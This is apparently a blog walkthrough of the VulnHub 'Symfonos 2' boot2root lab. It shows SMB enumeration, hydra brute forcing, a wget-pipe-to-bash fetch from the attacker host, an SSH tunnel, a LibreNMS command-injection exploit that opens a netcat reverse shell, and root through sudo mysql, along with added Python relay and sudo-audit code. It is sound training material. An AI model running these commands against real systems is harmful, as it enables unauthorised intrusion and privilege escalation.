INFO
Name : Symfonos 2
Difficulty : Intermediate
Type : boot2root
Source : VulnHub
URL : https://www.vulnhub.com/entry/symfonos-2,331/
Entry : 8 / 35
Welcome to the walkthrough for Symfonos: 2, a boot2root CTF found on VulnHub. This is the eleventh VM in my VulnHub Challenge, and the first in the “intermediate” category! These intermediate machines are more challenging than beginner machines and should represent a similar challenge to those found in the OSCP labs. The Symfonos family of virtual machines are more recent entries, with Symfonos: 2 being released on July 18, 2019.
GOAL
As with most CTFs from VulnHub, the goal is to get the text file which serves as the flag from the /root directory.
SETUP
I’m using both VMware Workstation and VirtualBox (depending on the condition of the image) to host Kali and the Symfonos: 2 image, with both VMs running in a NAT network (sometimes Bridged). The previous version of Symfonos used VirtualBox; I tried to use it with Workstation this time.
0. DISCOVERY
: netdiscover
1. SCANNING
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-27 12:42 KST
Nmap scan report for 192.168.20.8
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http WebFS httpd 1.21
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2. WEB ENUMERATION & RECONNAISSANCE
Tried nikto / dirb / wfuzz / curl
: no results
3. SMB RECONNAISSANCE
┌──(root💀takudaddy)-[/attack]
└─# smbclient -L //192.168.20.8
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk
IPC$ IPC IPC Service (Samba 4.5.16-Debian)
SMB1 disabled -- no workgroup available
enum4linux :
=========================================
| Share Enumeration on 192.168.20.8 |
=========================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk
IPC$ IPC IPC Service (Samba 4.5.16-Debian)
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 192.168.20.8
//192.168.20.8/print$ Mapping: DENIED, Listing: N/A
//192.168.20.8/anonymous Mapping: OK, Listing: OK
//192.168.20.8/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
Login to /anonymous is possible.
Connect with smbclient and gather information.
┌──(root💀takudaddy)-[/attack]
└─# smbclient //192.168.20.8/anonymous
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jul 18 23:30:09 2019
.. D 0 Thu Jul 18 23:29:08 2019
backups D 0 Thu Jul 18 23:25:17 2019
19728000 blocks of size 1024. 16313724 blocks available
smb: \> help
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff ..
!
smb: \> ls
. D 0 Thu Jul 18 23:30:09 2019
.. D 0 Thu Jul 18 23:29:08 2019
backups D 0 Thu Jul 18 23:25:17 2019
19728000 blocks of size 1024. 16313720 blocks available
smb: \> cd backups
smb: \backups\> ls
. D 0 Thu Jul 18 23:25:17 2019
.. D 0 Thu Jul 18 23:30:09 2019
log.txt N 11394 Thu Jul 18 23:25:16 2019
19728000 blocks of size 1024. 16313720 blocks available
smb: \backups\> get log.txt
getting file \backups\log.txt of size 11394 as log.txt (11125.9 KiloBytes/sec) (average 11127.0 KiloBytes/sec)
smb: \backups\> quit
File contents = SMB config + proftpd.conf
root@symfonos2:~# cat /etc/shadow > /var/backups/shadow.bak
root@symfonos2:~# cat /etc/samba/smb.conf
# Uncomment to allow remote administration of Windows print drivers.
# You may need to replace 'lpadmin' with the name of the group your
# admin users are members of.
# Please note that you also need to set appropriate Unix permissions
# to the drivers directory for these users to have write rights in it
; write list = root, @lpadmin
[anonymous]
path = /home/aeolus/share
browseable = yes
read only = yes
guest ok = yes
(skipped)
root@symfonos2:~# cat /usr/local/etc/proftpd.conf
# This is a basic ProFTPD configuration file (rename it to
# 'proftpd.conf' for actual use. It establishes a single server
# and a single anonymous login. It assumes that you have a user/group
# "nobody" and "ftp" for normal operation and anon.
ServerName "ProFTPD Default Installation"
ServerType standalone
DefaultServer on
# Port 21 is the standard FTP port.
Port 21
# Don't use IPv6 support by default.
UseIPv6 off
# Umask 022 is a good standard umask to prevent new dirs and files
# from being group and world writable.
Umask 022
# To prevent DoS attacks, set the maximum number of child processes
# to 30. If you need to allow more than 30 concurrent connections
# at once, simply increase this value. Note that this ONLY works
# in standalone mode, in inetd mode you should use an inetd server
# that allows you to limit maximum number of processes per service
# (such as xinetd).
MaxInstances 30
# Set the user and group under which the server will run.
User aeolus
Group aeolus
# To cause every FTP user to be "jailed" (chrooted) into their home
# directory, uncomment this line.
#DefaultRoot ~
# Normally, we want files to be overwriteable.
AllowOverwrite on
# Bar use of SITE CHMOD by default
<Limit SITE_CHMOD>
DenyAll
</Limit>
# A basic anonymous configuration, no upload directories. If you do not
# want anonymous users, simply delete this entire <Anonymous> section.
<Anonymous ~ftp>
User ftp
Group ftp
# We want clients to be able to login with "anonymous" as well as "ftp"
UserAlias anonymous ftp
# Limit the maximum number of anonymous logins
MaxClients 10
# We want 'welcome.msg' displayed at login, and '.message' displayed
# in each newly chdired directory.
#DisplayLogin welcome.msg
#DisplayChdir .message
# Limit WRITE everywhere in the anonymous chroot
<Limit WRITE>
DenyAll
</Limit>
</Anonymous>
Key information
: cat /etc/shadow > /var/backups/shadow.bak (could be useful later, after getting in)
: SMB share path = /home/aeolus/share
: user & group = aeolus
: FTP login = anonymous or ftp > doesn't work!
4. SSH (FTP) BRUTE FORCE
Password brute force
Try to find the password for the aeolus account.
┌──(root💀takudaddy)-[/attack]
└─# hydra -l aeolus -P /usr/share/wordlists/rockyou.txt ssh://192.168.20.8 -t 1
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-27 16:43:42
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 1 task per 1 server, overall 1 task, 14344399 login tries (l:1/p:14344399), ~14344399 tries per task
[DATA] attacking ssh://192.168.20.8:22/
[STATUS] 7.00 tries/min, 7 tries in 00:01h, 14344392 to do in 34153:19h, 1 active
[STATUS] 6.67 tries/min, 20 tries in 00:03h, 14344382 to do in 35860:58h, 1 active
[STATUS] 24.43 tries/min, 171 tries in 00:07h, 14344231 to do in 9786:31h, 1 active
[STATUS] 31.33 tries/min, 470 tries in 00:15h, 14343932 to do in 7629:46h, 1 active
[STATUS] 35.16 tries/min, 1090 tries in 00:31h, 14343312 to do in 6798:50h, 1 active
[STATUS] 17.64 tries/min, 1266 tries in 01:11h, 14343136 to do in 13554:29h, 1 active
[STATUS] 21.45 tries/min, 1883 tries in 01:27h, 14342519 to do in 11143:53h, 1 active
[STATUS] 23.92 tries/min, 2482 tries in 01:43h, 14341920 to do in 9994:59h, 1 active
[STATUS] 23.31 tries/min, 2810 tries in 02:00h, 14341592 to do in 10252:55h, 1 active
[STATUS] 25.06 tries/min, 3421 tries in 02:16h, 14340981 to do in 9539:14h, 1 active
Something is off. Usually it cracks within about 10 to 15 minutes, but after more than two hours it had only managed about three thousand attempts? If this happened during the exam it would be a disaster.
Since I can't just keep waiting, I need a fallback for cases like this, so I ran a few experiments. First, I brute-forced FTP instead of SSH, and it cracked within 15 minutes. I also switched the server's network mode to bridged and brute-forced both SSH and FTP again; SSH still didn't work, while FTP finished within 10 minutes.
┌──(root💀takudaddy)-[/attack]
└─# hydra -l aeolus -P /usr/share/wordlists/rockyou.txt 172.14.4.3 ftp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-27 22:46:23
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://172.14.4.3:21/
[STATUS] 2849.00 tries/min, 2849 tries in 00:01h, 14341550 to do in 83:54h, 16 active
[STATUS] 2901.33 tries/min, 8704 tries in 00:03h, 14335695 to do in 82:22h, 16 active
[STATUS] 2907.00 tries/min, 20349 tries in 00:07h, 14324050 to do in 82:08h, 16 active
[21][ftp] host: 172.14.4.3 login: aeolus password: sergioteamo
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-27 22:55:13
Whether it's a problem with the server itself I don't know, but the SSH connection is unstable, and
[STATUS] 59.53 tries/min, 893 tries in 00:15h, 14343539 to do in 4015:33h, 16 active
[ERROR] ssh target does not support password auth
errors like the one above keep appearing from time to time. My conclusion is that it's a system problem.
I don't know whether it was intended, but small technical problems like this break concentration, sap motivation and waste energy. I was planning to finish three boxes today; at this rate I may not finish even one.. Thinking of the wasted time makes me furious, but I console myself that this was preparation for something that could just as easily happen in the exam.
Anyway, let's keep going.
aeolus : sergioteamo
5. SSH LOGIN
┌──(root💀takudaddy)-[~]
└─# ssh aeolus@192.168.20.8
ssh: connect to host 192.168.20.8 port 22: Connection refused
┌──(root💀takudaddy)-[~]
└─# ssh aeolus@192.168.20.8
ssh: connect to host 192.168.20.8 port 22: Connection refused
┌──(root💀takudaddy)-[~]
└─# ssh aeolus@192.168.20.8
aeolus@192.168.20.8's password:
Linux symfonos2 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u3 (2019-06-16) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Mar 27 09:53:23 2021 from 192.168.20.1
aeolus@symfonos2:~$ id
uid=1000(aeolus) gid=1000(aeolus) groups=1000(aeolus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
aeolus@symfonos2:~$ who
Ugh..
This is clearly not intended but a system problem. It takes several tries to connect, and right after connecting the server goes down.. So annoying.. no wonder the crack wouldn't work.
aeolus@symfonos2:~$ sudo -l
[sudo] password for aeolus:
Sorry, user aeolus may not run sudo on symfonos2.
aeolus@symfonos2:~$ sudo /bin/bash
[sudo] password for aeolus:
aeolus is not in the sudoers file. This incident will be reported.
I was working over FTP, but there were too many restrictions, so in the end I connect to the server directly and work there.
6. EXPLOITATION
Basic steps after getting in:
check local ports, copy over the scanning tool and run it.
Ports 3306 / 5355 / 8080 were additionally found.
What is llmnr?
# wget http://192.168.20.1/linuxEnum.sh
# wget -qO - http://192.168.20.1/linuxEnum.sh | bash
Then search for the shadow copy found above:
: cat /etc/shadow > /var/backups/shadow.bak
Copying commands around was awkward, so I connect over SSH again and work from there. (Luckily it suddenly(?) works fine.)
┌──(root💀takudaddy)-[/attack]
└─# ssh aeolus@192.168.20.8
aeolus@192.168.20.8's password:
Linux symfonos2 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u3 (2019-06-16) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Sat Mar 27 10:13:36 2021
aeolus@symfonos2:~$ cat /var/backups/shadow.bak
Looks like this will be done quickly.
Copy the file to /tmp, edit the contents, put it back, and that's it?
aeolus@symfonos2:~$ cp /var/backups/shadow.bak /tmp
aeolus@symfonos2:~$ cd /tmp
aeolus@symfonos2:/tmp$ ls
linuxEnum.sh
linuxEnum.sh.1
shadow.bak
systemd-private-386ab85465e64535828c54cc663333db-apache2.service-k2v9i1
systemd-private-386ab85465e64535828c54cc663333db-systemd-resolved.service-e1WJEo
systemd-private-386ab85465e64535828c54cc663333db-systemd-timesyncd.service-gkPtEp
aeolus@symfonos2:/tmp$ ls -al shadow.bak
-rw-r--r-- 1 aeolus aeolus 1173 Mar 27 10:36 shadow.bak
aeolus@symfonos2:/tmp$
Nope~
No permission, so that doesn't work!
The newly discovered ports seem to be the key.
3306/tcp open mysql MySQL 5.5.5-10.1.38-MariaDB-0+deb9u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.1.38-MariaDB-0+deb9u1
| Thread ID: 14
| Capabilities flags: 63487
| Some Capabilities: IgnoreSpaceBeforeParenthesis, LongColumnFlag, InteractiveClient, Support41Auth, Speaks41ProtocolOld, SupportsTransactions, IgnoreSigpipes, Speaks41ProtocolNew, SupportsLoadDataLocal, FoundRows, DontAllowDatabaseTableColumn, ConnectWithDatabase, LongPassword, SupportsCompression, ODBCClient, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
| Status: Autocommit
| Salt: 9(Zl2R'j`%3p^ggRD=E#
|_ Auth Plugin Name: 103
8080/tcp open http Apache httpd 2.4.25 ((Debian))
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to http://localhost/login
Service Info: Host: SYMFONOS2; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
7. SSH TUNNELS : LOCAL PORT FORWARDING to 8080
Because the port is only served on the target's local host, we can't reach it by connecting from our side. One of the methods used in this situation is called 'tunneling': with SSH, forward a given port on our side to a given port on the target server.
Pass the -L (address) option in the form ourport:targetIP:targetport.
┌──(root💀takudaddy)-[/attack]
└─# ssh -L 7979:127.0.0.1:8080 aeolus@192.168.20.8
aeolus@192.168.20.8's password:
bind [127.0.0.1]:8080: Address already in use
Linux symfonos2 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u3 (2019-06-16) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Sat Mar 27 10:35:23 2021 from 192.168.20.1
aeolus@symfonos2:~$
The connection succeeded.
When we point at localhost(127.0.0.1):7979 on our side, it is forwarded to port 8080 on the target's local host.
Let's try it.
LibreNMS login page
┌──(root💀takudaddy)-[/attack]
└─# curl -v http://localhost:8080
* Trying ::1:8080...
* Connected to localhost (::1) port 8080 (#0)
> GET / HTTP/1.1
> Host: localhost:8080
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Sat, 27 Mar 2021 16:13:59 GMT
< Server: Apache/2.4.25 (Debian)
< Cache-Control: no-cache, private
< Location: http://localhost:8080/login
< Set-Cookie: XSRF-TOKEN=eyJpdiI6InlyXC9SOXNOb3FZVmZlQjBcL1FVN0dDdz09IiwidmFsdWUiOiJiTFAwZDdOeUFKZmNReWRBNnJmQzY4eEhZeVN0b3ROSDVYY1ZDbnVqckh1K3B4dTNTWFhVbzU4NUx2N2dub1hiV1B3YWRHVVRVRzdFOXZrS1NHRU1sZz09IiwibWFjIjoiMDlhZGVmNzgyZThlMWNiN2NmNTU2MDE3NzIzMzM4YzlmYTQzYzk0OWU3NDA1YzI4ZDg0YWE3MDM5NTc5Y2Y0YiJ9; expires=Sat, 27-Mar-2021 18:13:59 GMT; Max-Age=7200; path=/
< Set-Cookie: librenms_session=eyJpdiI6IkRseTQzZ25cLzZ6UWdSbnRvVVNCWTN3PT0iLCJ2YWx1ZSI6ImltamdsYmdFNWVhWlh4YTdJWWVYbERZdUZHQmQ3NmkyQ0ZNR3V3UkwzbStManZqZm1KSEZJSXdhU0dBeitxN3ZKQUpVU3BWT0M4TFNGc0VSQXhYQ25nPT0iLCJtYWMiOiJkZDQ5MzBiMzViN2E0N2YyZWRiMjYyZTZhNTZlZmMxOTcyMDFiZWFmZjM5NTg3NTViNDk0MGRlNjYyNTVkYzJiIn0%3D; expires=Sat, 27-Mar-2021 18:13:59 GMT; Max-Age=7200; path=/; httponly
< Content-Length: 352
< Content-Type: text/html; charset=UTF-8
<
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<meta http-equiv="refresh" content="0;url=http://localhost:8080/login" />
<title>Redirecting to http://localhost:8080/login</title>
</head>
<body>
Redirecting to <a href="http://localhost:8080/login">http://localhost:8080/login</a>.
</body>
* Connection #0 to host localhost left intact
</html>
Besides this method, you can also tunnel with a program called socat. On the target server, run
aeolus@symfonos2:~$ socat TCP-LISTEN:7979,fork TCP:127.0.0.1:8080
the command above. The principle is that TCP connections arriving on port 7979 are redirected to 127.0.0.1:8080. In our browser we just connect to the target's IP on port 7979.
Success!
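The socat relay above, re-implemented in Python as an added example (not part of the original post) so the forwarding can be run and tested offline: a constructed stand-in plays the LibreNMS vhost on an ephemeral port, and a listener splices each client onto it the way `socat TCP-LISTEN:7979,fork TCP:127.0.0.1:8080` does.

```python
import socket
import threading

def _pump(src, dst):
    """Copy one direction until EOF, then half-close the other side so the peer sees EOF."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass

def start_relay(listen_port, target_host, target_port, listen_host="127.0.0.1"):
    """Accept on listen_host:listen_port and splice each client to target_host:target_port.
    One thread pair per client is the equivalent of socat's ',fork'. Returns (socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((listen_host, listen_port))
    srv.listen(16)
    def accept_loop():
        while True:
            try:
                client, _ = srv.accept()
            except OSError:
                return  # listener closed
            try:
                upstream = socket.create_connection((target_host, target_port))
            except OSError:
                client.close()  # backend down: drop the client, as socat would
                continue
            threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()
    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, srv.getsockname()[1]

# Constructed stand-in for the LibreNMS vhost on the target's 127.0.0.1:8080: it answers
# every request with the same 302-to-/login that the real service returned to curl above.
FAKE_RESPONSE = (b"HTTP/1.1 302 Found\r\nLocation: http://localhost:8080/login\r\n"
                 b"Content-Length: 0\r\n\r\n")

def start_fake_backend():
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))  # ephemeral port, so the demo never needs a real 8080
    srv.listen(4)
    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                conn.recv(4096)
                conn.sendall(FAKE_RESPONSE)
    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]

def fetch_through_relay():
    """Client -> relay -> backend round trip; returns the raw HTTP response the client saw."""
    backend, backend_port = start_fake_backend()
    relay, relay_port = start_relay(0, "127.0.0.1", backend_port)
    try:
        with socket.create_connection(("127.0.0.1", relay_port), timeout=5) as c:
            c.sendall(b"GET / HTTP/1.1\r\nHost: localhost\r\n\r\n")
            return c.makefile("rb").read().decode()
    finally:
        relay.close()
        backend.close()
```

For a real relay, call `start_relay(7979, "127.0.0.1", 8080, listen_host="0.0.0.0")`; note that, exactly like the socat command, this exposes the loopback-only service to every host that can reach port 7979, which is why such relays are worth alerting on when they appear on a server.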
Try logging in as aeolus : sergioteamo
Success!
It tells me to click Edit Dashboard.
Looking in the settings, creating users is possible.
Not that it matters.
Search for a payload
┌──(root💀takudaddy)-[/attack]
└─# searchsploit librenms
-------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------- ---------------------------------
LibreNMS - addhost Command Injection (Metasploit) | linux/remote/46970.rb
LibreNMS - Collectd Command Injection (Metasploit) | linux/remote/47375.rb
LibreNMS 1.46 - 'addhost' Remote Code Execution | php/webapps/47044.py
LibreNMS 1.46 - 'search' SQL Injection | multiple/webapps/48453.txt
LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection | multiple/webapps/49246.py
Grab the Python addhost code in the middle.
┌──(root💀takudaddy)-[/attack]
└─# searchsploit -m php/webapps/47044.py
Exploit: LibreNMS 1.46 - 'addhost' Remote Code Execution
URL: https://www.exploit-db.com/exploits/47044
Path: /usr/share/exploitdb/exploits/php/webapps/47044.py
File Type: Python script, ASCII text executable, with CRLF line terminators
Copied to: /attack/47044.py
┌──(root💀takudaddy)-[/attack]
└─# vi 47044.py
┌──(root💀takudaddy)-[/attack]
└─# chmod +x *.py
Check the usage
┌──(root💀takudaddy)-[/attack]
└─# python attack.py
[!] Usage : ./exploit.py http://www.example.com cookies rhost rport
A cookie value is needed.
You can check it by opening the developer tools:
F12 > Storage > Cookies
All three have to be grabbed.
librenms_session=eyJpdiI6InU2TjU3WGtkamNySTFlazRjcWgxQkE9PSIsInZhbHVlIjoiK2NmVXhXTGRNdTR3b2dXNXJsNHord0hLcXBVSGMxcDhDV0tocDFcL0ZlREdVS0RBRFNmeVBac2hUMFhxYlduRVZLemhwek1GTWxtXC9TY011ckZ5d1BcL3c9PSIsIm1hYyI6IjZiZDJlNjM2ZTJjMmI0OGMwMjRjZGY2MmU2NzMyMjljMDJjY2MxMzMwOTg0NWVjZGNmZmI2MmQ1ZmU2NDcyNGEifQ%3D%3D ;
PHPSESSID=1dnetm4v9rt8gpm866b715qd21;
XSRF-TOKEN=eyJpdiI6InRDRHRJdWdQZkVCYzZPbENLZmpKK3c9PSIsInZhbHVlIjoiUDdPa1lQSEVNXC92dzNmVHZXOFh2Q3RXek04bGpiamh5SjlWQzVkTHJDVjlNUGdPYjA1Q1R6VkZcL2JrRG5oZkpMSW5kbjNiZ0ZcL1pqMlNBeDFBaVVJN0E9PSIsIm1hYyI6ImZmZDRmMTZhNjgyMTQ0NDk0NjI2NDJlZmU2NTM5ZmQ3ZDE1YThmY2YwZTRiNzZjOTQwMGI4Zjg3OTdlMDkxZDYifQ%3D%3D"
Since we need somewhere to receive the connection when the program runs, open a new terminal and start a listener.
┌──(root💀takudaddy)-[~]
└─# nc -lvp 8989
listening on [any] 8989 ...
Then run the program!
┌──(root💀takudaddy)-[/attack]
└─# python attack.py http://127.0.0.1:7979 "librenms_session=eyJpdiI6IitXczNjZ3FVTjZWR1VzV3hxMUdISWc9PSIsInZhbHVlIjoieFlFUmVVdEg3bUE2cDVJdGlsQ2Q3OWNqMFkraFhacVNseXBZSE9VXC9FcjJVSDVNYTRSbEpOZkVRZFR1Y0J5YTRxcllSVHlRMndldHNncHdTZnlvSyt3PT0iLCJtYWMiOiI5ZjExZTViNzM0MWIzMzMxOTRhNGIzNTMxODhkOTM1MmI4NjhlNzI3MWRjOWUxNDMwNzZiYWVhOThmZWM5NzFiIn0%3D\
;PHPSESSID=g96megcdhon6gvmem27g50pjk7;XSRF-TOKEN=eyJpdiI6ImgxTFFJVDRPOXptdnc5dGVmZkhBdWc9PSIsInZhbHVlIjoiQjlDbVFqdUQxZ0lvZUwzKzYwRHRIRzRnbUU2cVh0MThDXC8xUFdhNGNJQVwvbkZmT05iWktCTFl6UUE1MHhkdGVZMHdacWRWalJyY3ZCcmpXMW5EaDNcL2c9PSIsIm1hYyI6IjY2ODQ4NmU5ZDFjNzNiNTgxMWFjYzZkYmY5YTFmNTE2YTUyYzUyMDk3ZTIwMTliMzYyMDVhYzAwNjljZDBmODEifQ%3D%3D"
192.168.10.10 8989
[+] Device Created Sucssfully
Connection succeeded!
┌──(root💀takudaddy)-[~]
└─# nc -lvp 8989
listening on [any] 8989 ...
192.168.10.21: inverse host lookup failed: Unknown host
connect to [192.168.10.10] from (UNKNOWN) [192.168.10.21] 44414
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(cronus) gid=1001(cronus) groups=1001(cronus),999(librenms)
$ python -c 'import pty;pty.spawn("/bin/bash")'
Logged in as user cronus.
8. Privilege Escalation
cronus@symfonos2:/$ sudo -l
sudo -l
Matching Defaults entries for cronus on symfonos2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User cronus may run the following commands on symfonos2:
(root) NOPASSWD: /usr/bin/mysql
mysql can be run.
First, connect!
cronus@symfonos2:/$ sudo /usr/bin/mysql (or: sudo mysql)
sudo /usr/bin/mysql
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 32
Server version: 10.1.38-MariaDB-0+deb9u1 Debian 9.8
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| librenms |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.01 sec)
Nothing much there.
Run a bash shell from inside the mysql session:
MariaDB [(none)]> \! whoami
\! whoami
root
MariaDB [(none)]> \! /bin/bash (adding the -i option also works)
\! /bin/bash
root@symfonos2:/opt/librenms/html# id
id
uid=0(root) gid=0(root) groups=0(root)
root@symfonos2:/opt/librenms/html#
Or run it directly without entering mysql:
cronus@symfonos2:/$ sudo /usr/bin/mysql -e "\! /bin/bash" (sudo mysql -e '\! /bin/bash')
sudo mysql -e "\! /bin/bash"
root@symfonos2:/# id
id
uid=0(root) gid=0(root) groups=0(root)
root@symfonos2:/# cd /root
cd /root
root@symfonos2:~# ls
ls
proof.txt
root@symfonos2:~# cat proof.txt
cat proof.txt
Congrats on rooting symfonos:2!
(ASCII-art banner from proof.txt; whitespace lost in extraction)
Contact me via Twitter @zayotic to give feedback!
Done
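The `sudo -l` rule above is the whole privilege escalation: mysql's `\!`/`system` command spawns a shell as whatever user the client runs as. As an added example (not from the original post), this small audit parses `sudo -l` output and flags root rules for binaries with documented shell escapes; the escape list is a constructed, deliberately short subset, and the second sample rule is constructed for contrast.

```python
import re

# Binaries whose documented features hand the user a subprocess. When sudo runs them as
# root, that subprocess is root too. Constructed, deliberately short list; the mysql entry
# is the `\!` / `system` client command used on this box.
SHELL_ESCAPES = {
    "mysql": "client runs `\\! cmd` and `system cmd` through /bin/sh",
    "vim": "`:!cmd` and `:shell`",
    "less": "`!cmd` from the pager prompt",
    "find": "`-exec cmd ;`",
}

# One rule line of `sudo -l` output: "(runas) TAG: TAG: /path/cmd args, /path/other"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def parse_sudo_l(text):
    """Return [(runas_user, set_of_tags, command)] from the block that follows
    'may run the following commands'. Several commands on one line are split on commas."""
    rules, in_block = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_block = True
            continue
        m = RULE_RE.match(line) if in_block else None
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()  # "(root)" or "(ALL : ALL)"
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        for cmd in m.group("cmds").split(","):
            rules.append((runas, tags, cmd.strip()))
    return rules

def find_escapes(rules):
    """Flag rules that run an escape-capable binary as root. NOPASSWD makes it worse:
    a user whose password the attacker never learned (cronus here) is not even asked for it."""
    findings = []
    for runas, tags, cmd in rules:
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if runas in ("root", "ALL") and binary in SHELL_ESCAPES:
            findings.append({
                "command": cmd,
                "binary": binary,
                "nopasswd": "NOPASSWD" in tags,
                "why": SHELL_ESCAPES[binary],
            })
    return findings

# The `sudo -l` output captured as cronus on this box, plus one constructed harmless rule
# so the checker has something to pass as well as something to flag.
SAMPLE_SUDO_L = """\
Matching Defaults entries for cronus on symfonos2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User cronus may run the following commands on symfonos2:
    (root) NOPASSWD: /usr/bin/mysql
    (root) /bin/cat /var/log/syslog
"""

def audit(text=SAMPLE_SUDO_L):
    return find_escapes(parse_sudo_l(text))

if __name__ == "__main__":
    for f in audit():
        tag = "NOPASSWD " if f["nopasswd"] else ""
        print(f"[!] {tag}{f['command']}: {f['why']}")
```

The fix on the box side is not a longer deny list but removing the rule: a monitoring account that needs the database should hold its own MySQL credentials rather than root via sudo.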
10. EXTRA PRACTICE
Trying it with msfconsole
The steps below must be attempted after creating the SSH tunnel, exactly as above.
┌──(root💀takudaddy)-[/attack]
└─# msfconsole -q
msf6 > use exploit/linux/http/librenms_addhost_cmd_inject
[*] Using configured payload cmd/unix/reverse
msf6 exploit(linux/http/librenms_addhost_cmd_inject) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(linux/http/librenms_addhost_cmd_inject) > set RPORT 7979 (the port opened by the tunnel)
RPORT => 7979
msf6 exploit(linux/http/librenms_addhost_cmd_inject) > set username aeolus
username => aeolus
msf6 exploit(linux/http/librenms_addhost_cmd_inject) > set PASSWORD sergioteamo
PASSWORD => sergioteamo
msf6 exploit(linux/http/librenms_addhost_cmd_inject) > set LHOST 192.168.10.10
LHOST => 192.168.10.10
msf6 exploit(linux/http/librenms_addhost_cmd_inject) > set LPORT 7979 (anything works)
LPORT => 4444
